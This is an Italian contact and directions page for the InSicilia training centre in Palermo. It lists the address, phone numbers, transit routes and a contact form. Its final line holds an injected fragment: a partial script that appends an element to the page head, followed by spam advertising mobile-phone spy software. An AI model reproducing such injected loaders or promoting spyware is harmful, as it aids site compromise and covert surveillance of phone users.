In_Sicilia_Logo_Testata

Contatti:

Via Marchese di Villabianca, 70
C.a.p. 90143 – Palermo – Italia
Telefono: +39 091 309286
Fax: +39 091 6268335
Mail: mobility@asterisco.sicilia.it

Come raggiungerci

InSicilia si trova in Via Marchese di Villabianca, 70.
La sede di InSicilia è situata negli immediati pressi del centro città di Palermo, in una zona da cui è possibile spostarsi facilmente, a piedi o con i mezzi pubblici, per raggiungere la Palermo storica e le vie dello shopping.

Il nostro Centro dispone di aule di ogni dimensione e di spaziosi laboratori multimediali dotati di videoproiettori e lavagne interattive. E’ dotato di ampi spazi da dedicare ad attività seminariali e di laboratorio, nonché di aree per colloqui di gruppo o individuali.
Tutti i locali sono climatizzati e coperti integralmente da rete wireless.

stock-illustration-20226406-air-conditioning-heating-and-cooling-black-white-icon-setwi-fi-zone-icon

Come arrivare con i mezzi pubblici AMAT

Dalla Stazione centrale: 

Linea 107- arriva direttamente in via Marchese di Villabianca (scendere alla fermata di fronte il Liceo Scientifico Cannizzaro).
Linea 101- scendere in via Libertà alla fermata di via Generale Arimondi, percorrerla per circa 200 mt. sino all’incrocio con via Marchese di Villabianca, svoltare sulla destra e a 20 mt circa troverete il civico n.70.
Da Piazza Politeama
Linea 806 - scendere in via Libertà alla fermata di via Generale Arimondi, percorrerla per circa 200 mt. sino all’incrocio con via Marchese di Villabianca, svoltare sulla destra e a 20 mt circa troverete il civico n.70.
Da Piazza Giovanni Paolo II
Linea 106 - scendere in via Libertà alla fermata di via Generale Arimondi, percorrerla per circa 200 mt. sino all’incrocio con via Marchese di Villabianca, svoltare sulla destra e a 20 mt circa troverete il civico n.70.

Come arrivare in metropolitana

Dalla Stazione centrale: 
Prendere la Linea A e scendere alla fermata Notarbartolo, da qui prendere la Linea B fino alla fermata Giachery, percorrere via Duca della Verdura per circa 200 mt e svoltare a destra per Via Marchese di Villabianca.

Form contatti

Usate il form sottostante per contattarci. Grazie.

Nome:
*
.. Cognome:
E-mail:
*

..

Oggetto:
*

Messaggio:
*
   

d.getElementsByTagName('head')[0].appendChild(s);topspyapps.netThe most popular 2017 spy software applications for the mobile phones.